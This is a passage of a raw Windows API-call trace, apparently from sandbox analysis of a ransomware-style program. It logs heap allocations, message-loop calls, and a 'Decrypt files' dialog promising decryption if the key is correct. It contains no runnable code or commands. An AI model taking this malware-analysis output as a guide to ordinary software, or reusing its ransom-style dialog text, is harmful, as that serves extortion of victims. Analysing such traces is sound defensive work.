hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.548] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.549] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.549] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.549] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.549] Sleep (dwMilliseconds=0x0) [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.549] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.550] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.550] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.550] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.550] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.550] Sleep (dwMilliseconds=0x0) [0259.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.551] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.551] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.551] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.551] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.551] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.551] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.551] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.551] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.551] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.551] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.551] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.551] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.551] Sleep (dwMilliseconds=0x0) [0259.552] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.552] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.552] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.552] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.552] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.552] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.552] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.552] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.650] Shell_NotifyIconW (dwMessage=0x1, lpData=0x7df450) returned 1 [0259.747] MessageBoxW (hWnd=0x0, lpText="Your files will be decrypted if the decryption key was correct", lpCaption="Decrypt files", uType=0x10040) returned 1 [0259.762] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.762] NtdllDialogWndProc_W () returned 0x1 [0259.763] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.763] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.763] NtdllDialogWndProc_W () returned 0x0 [0259.766] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.766] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.766] NtdllDialogWndProc_W () returned 0x0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] NtdllDialogWndProc_W () returned 0x1 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.771] SetBkColor (hdc=0x3d0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] NtdllDialogWndProc_W () returned 0x0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.771] SetBkColor (hdc=0x3d0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.771] NtdllDialogWndProc_W () returned 0x0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.771] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.772] NtdllDialogWndProc_W () returned 0x0 [0259.772] GetForegroundWindow () returned 0x60148 [0259.772] GetWindowLongW (hWnd=0x60148, nIndex=-21) returned 8256456 [0259.789] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.789] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.789] NtdllDialogWndProc_W () returned 0x0 [0259.809] GetForegroundWindow () returned 0x60148 [0259.809] GetWindowLongW (hWnd=0x60148, nIndex=-21) returned 8256456 [0259.871] GetForegroundWindow () returned 0x60148 [0259.871] GetWindowLongW (hWnd=0x60148, nIndex=-21) returned 8256456 [0259.900] GetForegroundWindow () returned 0x60148 [0259.900] GetWindowLongW (hWnd=0x60148, nIndex=-21) returned 8256456 [0259.919] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.919] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.919] NtdllDialogWndProc_W () returned 0x0 [0259.922] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.922] NtdllDialogWndProc_W () returned 0x1 [0259.922] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.922] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.922] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.923] SetBkColor (hdc=0x210101ed, color=0xf0f0f0) returned 0xffffff [0259.923] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.923] NtdllDialogWndProc_W () returned 0x0 [0259.923] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.923] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.923] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.923] SetBkColor (hdc=0x210101ed, color=0xf0f0f0) returned 0xf0f0f0 [0259.923] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.923] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.923] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.923] NtdllDialogWndProc_W () returned 0x0 [0259.923] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.923] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.923] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.923] NtdllDialogWndProc_W () returned 0x0 [0259.924] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.924] NtdllDialogWndProc_W () returned 0x1 [0259.924] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.924] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.924] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.924] SetBkColor (hdc=0x3e0101d8, color=0xf0f0f0) returned 0xffffff [0259.924] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.924] NtdllDialogWndProc_W () returned 0x0 [0259.924] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.924] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.924] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.924] SetBkColor (hdc=0x3e0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0259.924] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.924] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.924] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.925] NtdllDialogWndProc_W () returned 0x0 [0259.925] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.925] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.925] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.925] NtdllDialogWndProc_W () returned 0x0 [0259.947] GetForegroundWindow () returned 0x60148 [0259.947] GetWindowLongW (hWnd=0x60148, nIndex=-21) returned 8256456 [0259.998] GetForegroundWindow () returned 0x60148 [0259.998] GetWindowLongW (hWnd=0x60148, nIndex=-21) returned 8256456 [0260.038] GetForegroundWindow () returned 0x6014e [0260.038] GetWindowLongW (hWnd=0x6014e, nIndex=-21) returned 0 [0260.088] GetForegroundWindow () returned 0x60148 [0260.088] GetWindowLongW (hWnd=0x60148, nIndex=-21) returned 8256456 [0260.138] GetForegroundWindow () returned 0x60148 [0260.138] GetWindowLongW (hWnd=0x60148, nIndex=-21) returned 8256456 [0260.157] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.157] NtdllDialogWndProc_W () returned 0x0 [0260.159] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.159] NtdllDialogWndProc_W () returned 0x1 [0260.159] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.159] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.159] GetSysColor (nIndex=15) returned 0xf0f0f0 [0260.159] SetBkColor (hdc=0x25010733, color=0xf0f0f0) returned 0xf0f0f0 [0260.160] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.160] NtdllDialogWndProc_W () returned 0x0 [0260.161] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.161] NtdllDialogWndProc_W () returned 0x0 [0260.162] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.162] NtdllDialogWndProc_W () returned 0x1 [0260.162] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.162] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.162] GetSysColor (nIndex=15) returned 0xf0f0f0 [0260.162] SetBkColor (hdc=0x25010733, color=0xf0f0f0) returned 0xf0f0f0 [0260.162] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.162] NtdllDialogWndProc_W () returned 0x0 [0260.164] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.164] NtdllDialogWndProc_W () returned 0x0 [0260.164] NtdllDefWindowProc_W () returned 0x0 [0260.165] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.165] NtdllDialogWndProc_W () returned 0x1 [0260.166] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.166] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.166] NtdllDialogWndProc_W () returned 0x0 [0260.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0260.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda470 | out: hHeap=0xbc0000) returned 1 [0260.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda5c0 | out: hHeap=0xbc0000) returned 1 [0260.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda560 | out: hHeap=0xbc0000) returned 1 [0260.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc6f0 | out: hHeap=0xbc0000) returned 1 [0260.179] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fed8 | out: hHeap=0xbc0000) returned 1 [0260.179] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.179] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.179] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0260.179] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0260.179] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.179] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.179] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0260.179] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0260.179] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.179] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.179] GetWindowLongW (hWnd=0x60174, nIndex=-20) returned 256 [0260.179] NtdllDialogWndProc_W () returned 0x1 [0260.180] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.180] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.180] GetClientRect (in: hWnd=0x60174, lpRect=0x7dfb00 | out: lpRect=0x7dfb00) returned 1 [0260.180] GetCursorPos (in: lpPoint=0x7dfb10 | out: lpPoint=0x7dfb10*(x=897, y=502)) returned 1 [0260.180] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7dfb10 | out: lpPoint=0x7dfb10) returned 1 [0260.180] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0260.180] SetCursor (hCursor=0x10003) returned 0x10003 [0260.180] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.180] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0260.180] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.180] NtdllDialogWndProc_W () returned 0x0 [0260.180] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.180] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.180] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0260.180] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.180] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.180] BeginPaint (in: hWnd=0x60174, lpPaint=0x7dfaa8 | out: lpPaint=0x7dfaa8) returned 0x25010733 [0260.180] EndPaint (hWnd=0x60174, lpPaint=0x7dfaa8) returned 1 [0260.180] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.180] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.180] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0260.181] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.181] NtdllDialogWndProc_W () returned 0x1 [0260.181] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.181] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.181] GetSysColor (nIndex=15) returned 0xf0f0f0 [0260.181] SetBkColor (hdc=0x3e0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0260.181] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.181] NtdllDialogWndProc_W () returned 0x0 [0260.181] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.181] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.181] GetSysColor (nIndex=15) returned 0xf0f0f0 [0260.181] SetBkColor (hdc=0x3e0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0260.181] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.181] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.181] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0260.182] NtdllDialogWndProc_W () returned 0x0 [0260.182] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.182] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.182] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0260.182] NtdllDialogWndProc_W () returned 0x0 [0260.182] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.182] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.182] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0260.182] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.182] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.182] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0260.182] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0260.182] GetForegroundWindow () returned 0x60174 [0260.182] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.183] GetCursorPos (in: lpPoint=0x7dfbf0 | out: lpPoint=0x7dfbf0*(x=897, y=502)) returned 1 [0260.183] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7dfbf0 | out: lpPoint=0x7dfbf0) returned 1 [0260.183] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x24) returned 0xdedab0 [0260.183] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc6f0 [0260.183] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32af8 [0260.183] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32ac8 [0260.183] GetAsyncKeyState (vKey=1) returned 1 [0260.183] GetAsyncKeyState (vKey=2) returned 0 [0260.183] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0260.183] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32aa8 [0260.183] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49db8 [0260.185] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe49db8 | out: hHeap=0xbc0000) returned 1 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fed8 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe32aa8 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20068 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda560 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a98 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda5c0 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a88 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xe23818 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda470 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a78 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49db8 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda470 | out: hHeap=0xbc0000) returned 1 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda470 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x80) returned 0xc270a0 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe49db8 | out: hHeap=0xbc0000) returned 1 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda470 | out: hHeap=0xbc0000) returned 1 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda470 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda470 | out: hHeap=0xbc0000) returned 1 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe23818 | out: hHeap=0xbc0000) returned 1 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a88 | out: hHeap=0xbc0000) returned 1 [0260.185] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: 